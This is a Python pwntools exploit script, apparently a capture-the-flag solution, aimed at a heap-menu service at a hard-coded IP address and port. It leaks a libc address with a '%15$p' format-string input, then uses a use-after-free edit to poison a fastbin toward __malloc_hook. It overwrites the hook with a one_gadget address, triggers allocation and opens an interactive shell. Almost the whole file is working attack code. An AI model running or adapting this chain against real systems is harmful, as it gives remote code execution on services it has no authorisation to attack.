from pwn import *

# Connection parameters and the local libc whose symbol table feeds the
# ``libc.symbols[...]`` lookups further down.  The endpoint is hard-coded.
HOST, PORT = "183.129.189.60", 10002
LIBC_PATH = "/lib/x86_64-linux-gnu/libc.so.6"

p = remote(HOST, PORT)
context.log_level = "debug"  # echo every byte exchanged with the service
libc = ELF(LIBC_PATH)
def create(index, content):
    """Walk the menu to the "create" action and supply one entry.

    Sends option 2, then sub-option 1, the index as a line, and finally the
    raw *content* bytes (no trailing newline) after the 'color:' prompt.
    Talks over the module-level connection ``p``.
    """
    choose = p.sendlineafter
    choose('Your Choice:', "2")
    choose('Your Choice:', "1")
    choose('index:', str(index))
    p.sendafter('color:', content)
def edit(index, content):
    """Walk the menu to the "edit" action (2 -> 0) and overwrite entry *index*.

    The index prompt on this path is matched on a bare ':' rather than
    'index:' (the prompt text presumably differs from the create/free paths);
    *content* is sent raw after 'color:'.  Uses the module-level connection ``p``.
    """
    steps = (
        ('Your Choice:', "2"),
        ('Your Choice:', "0"),
        (":", str(index)),
    )
    for prompt, answer in steps:
        p.sendlineafter(prompt, answer)
    p.sendafter('color:', content)


def free(index):
    """Walk the menu to the "free" action (3) and release entry *index*."""
    steps = (
        ('Your Choice:', "3"),
        ('index:', str(index)),
    )
    for prompt, answer in steps:
        p.sendlineafter(prompt, answer)
# NOTE(review): every constant below (the leak-to-base difference, the 0x23
# adjustment, the four ``onegad`` offsets and the 11-byte padding) is tied to
# one specific libc build / target binary and cannot be verified from this
# file alone.  Nothing here checks that the leak or the offsets are sane.

# Menu option 1 ("draw") is answered with the format specifier "%15$p"; the
# service's reply is then scanned for "0x" and exactly 12 hex digits are read.
p.sendlineafter('Your Choice:',"1")
p.sendlineafter('draw:',"%15$p")
p.recvuntil('0x')
# Leaked pointer minus a fixed difference of two addresses — presumably
# recorded in a debugging session against the same libc build; TODO confirm.
libc_base=int(p.recv(12),16)-(0x7f7e0aafb830-0x7f7e0aadb000)
success("libc_base===>0x%x"%libc_base)

# Entry 0 is created, freed, and then edited while freed — the target
# apparently leaves the entry usable after free; verify against the binary.
create(0,'11111')
free(0)
# The written value is the __malloc_hook address (from the local ELF loaded
# at the top of the file) shifted back by 0x23; the same value is sent again
# through the create path.
edit(0,p64(libc_base+libc.symbols['__malloc_hook']-0x23))
create(0,p64(libc_base+libc.symbols['__malloc_hook']-0x23))

# Four libc-specific offsets; only index 3 is used below.
onegad=[0x45216,0x4526a,0xf02a4,0xf1147]
# Entry 1's content: 0x13-0x8 = 11 zero bytes of padding followed by two
# copies of libc_base+onegad[3].
create(1,'\x00'*(0x13-0x8)+p64(libc_base+onegad[3])+p64(libc_base+onegad[3]))
free(0)

# Same menu path as create() up to the index prompt, without answering the
# 'color:' prompt; the connection is then handed to the user.
p.sendlineafter('Your Choice:',"2")
p.sendlineafter('Your Choice:',"1")
p.sendlineafter('index:','0')
p.interactive()